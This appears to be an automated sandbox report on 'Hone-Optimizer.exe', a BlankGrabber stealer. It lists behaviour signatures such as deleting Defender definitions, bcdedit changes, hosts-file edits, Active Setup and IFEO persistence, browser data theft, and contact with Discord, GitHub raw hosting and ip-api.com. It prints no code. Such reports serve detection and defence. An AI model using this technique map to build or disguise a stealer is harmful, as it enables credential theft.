Malware Analysis Report

2024-12-07 10:00

Sample ID 241114-n2gqbssncp
Target Hone-Optimizer.exe
SHA256 07f228e81a538261d88699e099867204dc8fa6ba44590a75bd6c17bf50217b65
Tags
blankgrabber defense_evasion discovery evasion execution persistence ransomware spyware stealer upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

07f228e81a538261d88699e099867204dc8fa6ba44590a75bd6c17bf50217b65

Threat Level: Known bad

The file Hone-Optimizer.exe was found to be: Known bad.

Malicious Activity Summary

blankgrabber defense_evasion discovery evasion execution persistence ransomware spyware stealer upx

A stealer written in Python and packaged with PyInstaller

Blankgrabber family

Deletes Windows Defender Definitions

Modifies boot configuration data using bcdedit

Command and Scripting Interpreter: PowerShell

Boot or Logon Autostart Execution: Active Setup

Event Triggered Execution: Image File Execution Options Injection

Drops file in Drivers directory

Reads user/profile data of web browsers

Checks computer location settings

Loads dropped DLL

Executes dropped EXE

Obfuscated Files or Information: Command Obfuscation

Power Settings

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Enumerates connected drives

Enumerates processes with tasklist

UPX packed file

Launches sc.exe

Hide Artifacts: Ignore Process Interrupts

Drops file in Windows directory

System Location Discovery: System Language Discovery

Enumerates physical storage devices

System Time Discovery

Browser Information Discovery

Modifies registry class

Checks SCSI registry key(s)

Gathers network information

Detects videocard installed

Suspicious use of SetWindowsHookEx

Uses Volume Shadow Copy service COM API

Views/modifies file attributes

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Modifies registry key

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Kills process with taskkill

Modifies Internet Explorer settings

cURL User-Agent

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-14 11:53

Signatures

A stealer written in Python and packaged with PyInstaller

Description Indicator Process Target
N/A N/A N/A N/A

Blankgrabber family

blankgrabber

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-14 11:53

Reported

2024-11-14 11:59

Platform

win10ltsc2021-20241023-en

Max time kernel

298s

Max time network

369s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Boot or Logon Autostart Execution: Active Setup

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Active Setup\Installed Components N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Active Setup\Installed Components N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Active Setup\Installed Components N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Active Setup\Installed Components N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Active Setup\Installed Components N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Active Setup\Installed Components N/A N/A

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A

Event Triggered Execution: Image File Execution Options Injection

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions\IoPriority = "3" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions\CpuPriorityClass = "4" C:\Windows\system32\reg.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Windows\system32\rundll32.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe N/A

Reads user/profile data of web browsers

spyware stealer

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: N/A N/A
File opened (read-only) \??\F: N/A N/A
File opened (read-only) \??\D: N/A N/A
File opened (read-only) \??\F: N/A N/A
File opened (read-only) \??\D: N/A N/A
File opened (read-only) \??\D: N/A N/A
File opened (read-only) \??\D: N/A N/A
File opened (read-only) \??\F: N/A N/A
File opened (read-only) \??\D: N/A N/A
File opened (read-only) \??\F: N/A N/A
File opened (read-only) \??\F: N/A N/A
File opened (read-only) \??\F: N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

UPX packed file

upx

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Logs\DISM\dism.log C:\Windows\system32\Dism.exe N/A
File opened for modification C:\Windows\Logs\DISM\dism.log C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe N/A
File opened for modification C:\Windows\Logs\CBS\CBS.log C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe N/A
File opened for modification C:\Windows\CbsTemp C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe N/A

Hide Artifacts: Ignore Process Interrupts

defense_evasion
Description Indicator Process Target
N/A N/A N/A N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A

System Time Discovery

discovery
Description Indicator Process Target
N/A N/A N/A N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Capabilities N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Capabilities N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A N/A N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A N/A N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Internet Explorer\GPU N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Internet Explorer\GPU N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Internet Explorer\GPU N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Internet Explorer\GPU N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Internet Explorer\GPU N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Internet Explorer\GPU N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Internet Explorer\GPU N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Internet Explorer\GPU N/A N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\es-ES\\VoiceActivation_es-ES.dat" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech Recognition Engine - ja-JP Embedded DNN v11.1" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\ja-JP\\sidubm.table" N/A N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ N/A N/A
